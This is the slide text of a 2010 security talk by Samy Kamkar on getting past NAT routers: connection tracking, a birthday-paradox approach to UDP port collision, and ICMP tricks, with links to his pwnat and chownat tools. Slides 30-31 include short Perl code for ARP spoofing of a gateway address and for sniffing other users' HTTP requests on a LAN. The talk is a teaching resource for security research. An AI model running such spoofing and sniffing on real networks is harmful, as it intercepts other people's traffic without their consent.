NETWORK CONQUERING:
Advanced LAN Manipulation
Samy Kamkar
July 10, 2010
LILAX
1
Who is Samy?
• Co-Founder of Fonality, IP PBX Company
• Passionate Developer
• MySpace XSS Worm author
• ”Narcissistic Vulnerability Pimp”
(aka Security Researcher for fun)
• Lady Gaga aficionado
2
Why am I talking?
• Bore you with NATs and how they work
• Entertain you with pictures
• Teach unknown “features” of NATs
• Learn interesting paradoxes of NATs
• Check out tools to evade NATs
• I like turtles
3
This is your network.
4
This is your network on drugs.
5
A NAT
6
Things that went out
of style by early 2000
IPs
7
Onto the anatomy…
• Goal: penetrating a NAT from another NAT
• Typical NAT: when a packet is received, it’s
normally only sent off to a client if it’s a
packet from a pre-existing connection
• Thus, there should be no way to create a
connection from one NAT to another if the
destination NAT doesn’t allow unknown
incoming packets
8
Our path for a typical packet.
9
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?
–…
10
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?
– NAT RFCs 1631, 2663
– linux-source/net/ipv4/netfilter/nf_nat_*.c
• …
11
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?
– NAT RFCs 1631, 2663
– linux-source/net/ipv4/netfilter/nf_nat_*.c
• Educate: what packets are normally
allowed through? Part of what protocols?
–…
12
Roadblock: the NAT? Nah…
• Educate: what is a NAT? How does it work?
– NAT RFCs 1631, 2663
– linux-source/net/ipv4/netfilter/nf_nat_*.c
• Educate: what packets are normally
allowed through? Part of what protocols?
– TCP, RFC 793
• RFC 5382 (NAT for TCP)
– UDP, RFC 768
• RFC 4787 (NAT for UDP)
– ICMP, RFC 792
• RFC 5508 (NAT for ICMP)
13
Educate: the protocols
• We don’t know how to exploit the NAT.
• Can we exploit the protocol?
• TCP: only allows packets in from existing connections
– So what is an “existing connection”?
– A packet that matches source/dest IP, source/dest port, and
seq/ack number (some of which are rewritten from the
NAT)
14
Educate: the protocols
• We don’t know how to exploit the NAT.
• Can we exploit the protocol?
• UDP: only allows packets in from existing
“connections” (despite being connection-less)
– So what is an “existing connection”?
– A packet that matches source/dest IP, source/dest port
– Wait a second…we know the source/dest IP, and we can
control the source/dest ports…
UDP Header
15
Our path for a typical packet.
16
17
But my NAT munges ports!
•
•
•
•
•
Well, damn.
Some NATs randomize source port
16 bits = 65536 possible ports
I can send ~550 packets in 1 second
So 65536 packets in 120 seconds 
18
Birthday Paradox: to be 16 again
• Birthdays happen more often than you think.
n = round( sqrt(-2 * ln(1 - probability_of_match)) * sqrt(total_items) )
19
Birthday Paradox: continued
• If each side sends 545 random source packets
regardless of whether NAT munges ports,
there’s a 99% chance of collision!
• 23 people in a room = 50% chance
• 57 people =
99% chance
• 366 people =
100% chance
20
21
True client-server model
• How do we penetrate the NAT like a true client?
• Can we exploit the protocol?
• TCP: only allows packets in from existing connections
– So what is an “existing connection”?
– A packet that matches source/dest IP, source/dest port, and
seq/ack number (some of which are rewritten from the
NAT)
• UDP: only allows packets in from existing
“connections” (despite being connection-less)
– So what is an “existing connection”?
– A packet that matches source/dest IP, source/dest port
– But we don’t know the source IP…
22
True client-server model cont.
• ICMP: Echo request
– Requests never penetrate NATs, will never hit a client
• …
23
True client-server model cont.
• ICMP: Echo request
– Requests never penetrate NATs, will never hit a client
• ICMP: Echo reply
– Replies only go through from a request
– We know we can’t send a request, never penetrates a NAT
• …
24
True client-server model cont.
• ICMP: Echo request
– Requests never penetrate NATs, will never hit a client
• ICMP: Echo reply
– Replies only go through from a request
– We know we can’t send a request, never penetrates a NAT
• ICMP: Time exceeded (traceroute)
–
–
–
–
–
Only goes through in response to an IP packet
Well, all computers can send IP packets
How does a time exceeded packet work?
Content of packet must contain packet originally sent out
We don’t know what the server sends out unless we
arbitrarily send out fixed packets that we later “respond to”
25
A Brief History of Crime
26
27
28
ARP Spoofing
ARP Spoofing
29
ARP Spoofing – Simple!
my $raw = new Packet::Inject(device => $device); # inject raw packets!
my $eth = new Packet::Ethernet()->encode();
# eth pkt will broadcast
my $arp = new Packet::ARP(
sender_eth => "a:b:c:d:e:f",
# our MAC
target_eth => ”ff:ff:ff:ff:ff:ff",
# broadcast
sender_ip => ”10.0.0.1",
# ip we’re stealing
target_ip => ”255.255.255.255”
# notifying broadcast
)->encode();
# now we have a built packet
$arp
$raw->open();
# open our device for injection
$raw->write(packet => $eth . $arp);
# inject!!!
$raw->close();
30
Epic Browser Sniffing FTW
sub callback {
my ($ud, $hdr, $pkt, $s) = @_;
$eth->decode($pkt);
# decode ethernet packet
if ($eth->type == 0x0800) {
# 0x0800 == IP packet
$ip->decode($eth->data);
# decode IP packet
if ($ip->proto == 6) {
# TCP packet
$tcp->decode($ip->data);
# decode TCP packet
if ($tcp->dest_port == 80) { # HTTP packet
# read HTTP header
if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) {
# use applescript to open our browser!
system qq{osascript -e 'tell application "Safari”
to open location “http://$2$1”’};
}}}}}
31
32
Q&A
A gentleman never asks.
A lady never tells.
33
Fin
pwnat:
chownat:
Packet:
Samy Kamkar
www.samy.pl
samy@samy.pl
twitter.com/SamyKamkar
samy.pl/pwnat
samy.pl/chownat
samy.pl/packet
34